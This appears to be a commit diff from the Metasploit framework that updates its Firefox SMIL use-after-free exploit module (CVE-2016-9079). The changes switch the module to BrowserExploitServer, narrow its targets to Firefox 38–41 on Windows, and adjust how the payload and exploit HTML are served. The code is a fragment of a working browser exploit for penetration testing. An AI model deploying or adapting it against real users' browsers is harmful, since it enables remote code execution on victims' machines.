Land #7895, Update firefox_uaf_smil to use BrowserExploitServer
commit
b4a9bfc7a9
|
@ -8,7 +8,7 @@ require 'msf/core'
|
|||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -25,9 +25,17 @@ require 'msf/core'
|
|||
'William Webb <william_webb[at]rapid7.com>' # Metasploit module
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
source: /script/i,
|
||||
os_name: OperatingSystems::Match::WINDOWS,
|
||||
ua_name: HttpClients::FF,
|
||||
# Fixed in Firefox 50.0.2
|
||||
ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Mozilla Firefox',
|
||||
[ 'Mozilla Firefox 38 to 41',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -42,9 +50,9 @@ require 'msf/core'
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2016-9079' ],
|
||||
[ 'Bugzilla', '1321066' ]
|
||||
[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
|
||||
[ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
'DisclosureDate' => "Nov 30 2016",
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
|
@ -60,7 +68,7 @@ require 'msf/core'
|
|||
p = payload.encoded
|
||||
arch = Rex::Arch.endian(target.arch)
|
||||
payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
|
||||
base_uri = "#{get_resource.chomp('/')}"
|
||||
base_uri = get_module_resource
|
||||
|
||||
# stuff that gets adjusted alot during testing
|
||||
|
||||
|
@ -248,28 +256,16 @@ require 'msf/core'
|
|||
send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
|
||||
end
|
||||
|
||||
def is_ff_on_windows(user_agent)
|
||||
target_hash = fingerprint_user_agent(user_agent)
|
||||
if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
|
||||
return false
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
def on_request_exploit(cli, request, browser_info)
|
||||
print_status("Got request: #{request.uri}")
|
||||
print_status("From: #{request.headers['User-Agent']}")
|
||||
if (!is_ff_on_windows(request.headers['User-Agent']))
|
||||
print_error("Unsupported user agent: #{request.headers['User-Agent']}")
|
||||
send_not_found(cli)
|
||||
close_client(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /worker\.js/
|
||||
print_status("Sending worker thread Javascript ...")
|
||||
worker_js(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /index\.html/ or request.uri =~ /\//
|
||||
|
||||
print_status("Sending exploit HTML ...")
|
||||
|
|
Loading…
Reference in New Issue